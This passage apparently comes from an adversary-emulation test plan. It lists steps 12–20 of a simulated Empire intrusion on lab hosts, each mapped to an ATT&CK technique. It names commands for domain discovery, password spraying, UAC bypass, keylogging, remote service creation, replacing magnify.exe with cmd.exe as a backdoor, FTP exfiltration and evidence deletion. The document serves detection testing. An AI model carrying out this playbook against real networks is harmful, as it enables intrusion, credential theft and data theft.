Commonly Used Port, Standard Application Layer Protocol, Standard Cryptographic Protocol

i. Empire: C2 channel established

Step 12: Initial Discovery

12.A.1 Discovery

System Network Configuration Discovery

i. Empire: 'route print' via PowerShell

12.A.2 Discovery

System Network Configuration Discovery

i. Empire: 'ipconfig /all' via PowerShell

12.B.1 Discovery

System Owner / User Discovery

i. Empire: 'whoami /all /fo list' via PowerShell

12.C.1 Discovery

Process Discovery

i. Empire: 'qprocess *' via PowerShell

12.D.1 Discovery

System Service Discovery

i. Empire: 'net start' via PowerShell

12.E.1 Defense Evasion, Execution

Scripting

i. Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques

12.E.1.1 Discovery

System Owner / User Discovery

i. Empire: WinEnum module included enumeration of user information

12.E.1.2 Discovery

Permission Groups Discovery

i. Empire: WinEnum module included enumeration of AD group memberships

12.E.1.3 Discovery

Password Policy Discovery

i. Empire: WinEnum module included enumeration of password policy information

12.E.1.4.1 Discovery

File and Directory Discovery

i. Empire: WinEnum module included enumeration of recently opened files

12.E.1.4.2 Discovery

File and Directory Discovery

i. Empire: WinEnum module included enumeration of interesting files

12.E.1.5 Collection

Clipboard Data

i. Empire: WinEnum module included enumeration of clipboard contents

12.E.1.6.1 Discovery

System Information Discovery

i. Empire: WinEnum module included enumeration of system information

12.E.1.6.2 Discovery

System Information Discovery

i. Empire: WinEnum module included enumeration of Windows update information

12.E.1.7 Discovery

Query Registry

i. Empire: WinEnum module included enumeration of system information via a Registry query

12.E.1.8 Discovery

System Service Discovery

i. Empire: WinEnum module included enumeration of services

12.E.1.9.1 Discovery

Network Share Discovery

i. Empire: WinEnum module included enumeration of available shares

12.E.1.9.2 Discovery

Network Share Discovery

i. Empire: WinEnum module included enumeration of mapped network drives

12.E.1.10.1 Discovery

Security Software Discovery

i. Empire: WinEnum module included enumeration of AV solutions

12.E.1.10.2 Discovery

Security Software Discovery

i. Empire: WinEnum module included enumeration of firewall rules

12.E.1.11 Discovery

System Network Configuration Discovery

i. Empire: WinEnum module included enumeration of network adapters

12.E.1.12 Discovery

System Network Connections Discovery

i. Empire: WinEnum module included enumeration of established network connections

12.F.1 Discovery

Permission Groups Discovery

i. Empire: 'net group "Domain Admins" /domain' via PowerShell

12.F.2 Discovery

Permission Groups Discovery

i. Empire: 'net localgroup administrators' via PowerShell

12.G.1 Discovery

Account Discovery

i. Empire: 'net user' via PowerShell

12.G.2 Discovery

Account Discovery

i. Empire: 'net user /domain' via PowerShell

Step 13: Discovery for Lateral Movement

13.A.1 Discovery

Remote System Discovery

i. Empire: 'net group "Domain Computers" /domain' via PowerShell

13.B.1 Discovery

System Network Connections Discovery

i. Empire: 'net use' via PowerShell

13.B.2 Discovery

System Network Connections Discovery

i. Empire: 'netstat -ano' via PowerShell

13.C.1 Discovery

Query Registry

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key

Step 14: Privilege Escalation

14.A.1 Defense Evasion, Privilege Escalation

Bypass User Account Control, Commonly Used Port, Remote File Copy, Standard Application Layer Protocol

i. Empire: UAC bypass module downloaded and executed a new Empire stager (wdbypass)

Step 15: Credential Access

15.A.1 Discovery

Application Window Discovery, Input Capture

i. Empire: Built-in keylogging module executed to capture keystrokes of user Bob

15.B.1 Credential Access

Credentials in Files

i. Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Step 16: Lateral Movement

16.A.1 Credential Access

Brute Force, Windows Admin Shares

i. Empire: 'net use' via PowerShell to attempt brute-force (password spraying) authentication to Morris (10.0.1.4) and Nimda (10.0.1.6) using the credentials of users Kmitnick, Bob, and Frieda

16.B.1 Lateral Movement

Windows Admin Shares, Valid Accounts, Brute Force

i. Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick

16.C.1 Defense Evasion

Network Share Connection Removal

i. Empire: 'net use /delete' via PowerShell

16.D.1 Lateral Movement

Windows Admin Shares, Valid Accounts

i. Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)

16.E.1 Command and Control, Lateral Movement

Remote File Copy

i. Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)

16.F.1 Execution

Command-Line Interface

i. Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick

16.G.1 Command and Control, Lateral Movement

Remote File Copy

i. Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)

16.H.1 Discovery

System Service Discovery

i. Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)

16.I.1 Persistence, Privilege Escalation

New Service, Masquerading

i. Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)

16.J.1 Discovery

System Service Discovery

i. Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)

16.K.1 Discovery

File and Directory Discovery

i. Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)

16.L.1 Execution

Service Execution

i. Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)

Step 17: Persistence

17.A.1 Discovery

System Service Discovery, Query Registry

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services

17.B.1 Defense Evasion

File Permissions Modification

i. Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe

17.B.2 Defense Evasion

File Permissions Modification

i. Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe

17.C.1 Persistence, Privilege Escalation

Accessibility Features

i. Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe

Step 18: Collection

18.A.1 Discovery

File and Directory Discovery

i. Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

18.B.1 Collection

Data Staged, Data from Network Shared Drive

i. Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)

Step 19: Exfiltration

19.A.1 Defense Evasion

Masquerading, Remote File Copy

i. Empire: File dropped to disk is a renamed copy of the WinRAR binary

19.B.1 Exfiltration

Data Compressed, Data Encrypted, Masquerading

i. Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file

19.C.1 Exfiltration

Exfiltration Over Alternative Protocol

i. Empire: Sequence of 'echo' commands via PowerShell to populate commands in text file (ftp.txt), which is then executed by FTP to exfil data through network connection separate of existing C2 channel

19.D.1 Defense Evasion

File Deletion

i. Empire: 'del C:\"$"Recycle.bin\old.rar'

19.D.2 Defense Evasion

File Deletion

i. Empire: 'del recycler.exe'

Step 20: Execution of Persistence

20.A.1 Persistence, Privilege Escalation

Accessibility Features, Remote Desktop Protocol

i. magnify.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)

20.B.1 Discovery

System Owner / User Discovery

i. Executed 'whoami' via cmd persistence mechanism through RDP connection made to Creeper (10.0.0.4)